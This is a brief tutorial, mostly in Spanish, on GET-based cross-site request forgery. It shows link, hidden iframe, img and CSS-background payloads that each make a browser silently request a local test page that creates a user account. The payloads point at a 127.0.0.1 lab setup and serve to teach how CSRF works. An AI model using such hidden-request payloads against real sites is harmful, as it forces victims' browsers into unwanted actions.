Tabla de contenido
0X01 Utilización del enlace
En html, la etiqueta a representa un enlace, que puede guiar el "foco" actual a otra ubicación.
El "foco" en movimiento debe enviar la solicitud correspondiente a la dirección apuntada por el enlace y luego devolver la respuesta.
<a href = “请求地址,会被http 请求到的位置,可以携带GET型参数”> 内容 </a>
<a href = “http://127.0.0.1/csrf_test/get_csrf/new_user.php?username=liuxiaoyang&password=123456”>请点击我</a>
0X02 utilización de iframe
El contenido de la etiqueta iframe se cargará automáticamente durante el proceso de carga de la página. La ubicación a la que apunta src es la ubicación solicitada por la página.
Nota: Puede configurar el estilo -> display: none del iframe para que no muestre el contenido cargado por el iframe.
<iframe src=”http://127.0.0.1/csrf_test/get_csrf/new_user.php?username=liuxiaoyang&password=123456” style=”display:none” />
0X03 utilización de etiquetas img
El contenido de la etiqueta img se solicitará a medida que se cargue la página, y la ubicación señalada por src se solicitará durante el proceso de carga de la página.
<img src=”http://127.0.0.1/csrf_test/get_csrf/new_user.php?username=liuxiaoyang&password=123456” />
0X04 Uso de CSS-backgroud
Puede usar la URL en el estilo de fondo en CSS para cargar el contenido en la máquina remota, enviando así una solicitud HTTP al contenido en la URL.
Por ejemplo:
body
{
background: #00FF00 url(bgimage.gif) no-repeat fixed top;
}
Puede usar la URL en el estilo de fondo en CSS para cargar el contenido en la máquina remota, enviando así una solicitud HTTP al contenido en la URL.
Por ejemplo:
body
{
background: #00FF00 url(“http://127.0.0.1/csrf_test/get_csrf/new_user.php?username=liuxiaoyang&password=123456”) no-repeat fixed top;
}
